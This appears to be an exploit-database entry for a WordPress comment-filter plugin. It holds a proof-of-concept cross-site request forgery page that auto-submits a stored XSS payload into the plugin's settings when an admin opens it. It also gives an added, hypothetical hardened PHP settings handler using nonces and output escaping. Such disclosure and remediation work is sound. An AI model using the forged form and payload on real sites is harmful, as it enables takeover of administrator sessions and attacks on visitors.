## https://sploitus.com/exploit?id=WPEX-ID:9C1C6D61-5588-4C21-95F6-2818C4F5C355
Make an admin open an HTML file containing the following:
```html
<form action="https://example.com/wp-admin/plugins.php?page=abg_commentsafe" method="POST">
    <input type="text" name="abg_commentsafe_tags" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="abg_commentsafe_behaviour" value="strip">
    <input type="text" name="submit" value="Update Tags">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>
```
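
The form above carries no nonce field, and its `">` payload is shaped to break out of an HTML attribute when the saved value is displayed. A settings handler that closes both gaps, as an added example that is not the plugin's own code: the field names come from the form, while the function name, nonce action, option keys and the `escape` behaviour value are assumptions.

```php
<?php
// Added example: hypothetical hardened settings page, not the plugin's code.
// Field names are from the PoC form; everything else named here is assumed.

const ABG_NONCE_ACTION = 'abg_commentsafe_save'; // assumed nonce action

function abg_commentsafe_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['submit'] ) ) {
        // Dies unless the request carries a nonce minted for this user and
        // action; an auto-submitted cross-site form cannot supply one.
        check_admin_referer( ABG_NONCE_ACTION );

        $tags = sanitize_text_field( wp_unslash( $_POST['abg_commentsafe_tags'] ?? '' ) );
        // Assumed format: comma-separated tag names such as "a,b,img".
        $tags = preg_replace( '/[^a-z0-9, ]/i', '', $tags );

        // Allow-list the mode; "escape" is an assumed second value.
        $behaviour = sanitize_key( wp_unslash( $_POST['abg_commentsafe_behaviour'] ?? '' ) );
        if ( ! in_array( $behaviour, array( 'strip', 'escape' ), true ) ) {
            $behaviour = 'strip';
        }

        update_option( 'abg_commentsafe_tags', $tags );
        update_option( 'abg_commentsafe_behaviour', $behaviour );
    }

    $tags      = get_option( 'abg_commentsafe_tags', '' );
    $behaviour = get_option( 'abg_commentsafe_behaviour', 'strip' );
    ?>
    <form method="post">
        <?php wp_nonce_field( ABG_NONCE_ACTION ); ?>
        <!-- esc_attr() stops a stored '">' from closing the value attribute -->
        <input type="text" name="abg_commentsafe_tags" value="<?php echo esc_attr( $tags ); ?>">
        <select name="abg_commentsafe_behaviour">
            <option value="strip" <?php selected( $behaviour, 'strip' ); ?>>strip</option>
            <option value="escape" <?php selected( $behaviour, 'escape' ); ?>>escape</option>
        </select>
        <input type="submit" name="submit" value="Update Tags">
    </form>
    <?php
}
```

The nonce check blocks the forged request, and the escaping on output still matters for values saved before the check existed.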